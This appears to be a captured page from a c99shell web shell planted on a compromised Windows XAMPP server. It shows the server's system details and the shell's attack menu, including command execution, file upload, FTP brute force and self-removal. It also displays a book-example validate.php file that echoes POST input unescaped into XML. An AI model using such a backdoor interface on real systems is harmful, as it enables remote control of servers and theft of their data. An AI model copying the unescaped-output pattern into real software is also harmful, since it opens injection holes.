!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\AjaxPhpCode\Chapter04\ajax\validate\   drwxrwxrwx
Free 4.96 GB of 239.26 GB (2.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     validate.php (1.29 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// start PHP session
session_start();
// load error handling script and validation class
require_once ('error_handler.php');
require_once (
'validate.class.php');
  
// Create new validator object
$validator = new Validate();

// read validation type (PHP or AJAX?)
$validationType '';  
if (isset(
$_GET['validationType']))
{
  
$validationType $_GET['validationType'];
}

// AJAX validation or PHP validation?
if ($validationType == 'php')
{
  
// PHP validation is performed by the ValidatePHP method, which returns
  // the page the visitor should be redirected to (which is allok.php if
  // all the data is valid, or back to index.php if not)
  
header("Location:" $validator->ValidatePHP());
}
else
{
  
// AJAX validation is performed by the ValidateAJAX method. The results
  // are used to form an XML document that is sent back to the client
  
$response 
   
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>' .
   
'<response>' .
     
'<result>' .
       
$validator->ValidateAJAX($_POST['inputValue'], $_POST['fieldID']) .
     
'</result>' .
     
'<fieldid>' .
       
$_POST['fieldID'] .  
     
'</fieldid>' .
   
'</response>'
  
// generate the response
  
if(ob_get_length()) ob_clean();
  
header('Content-Type: text/xml');
  echo 
$response;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0936 ]--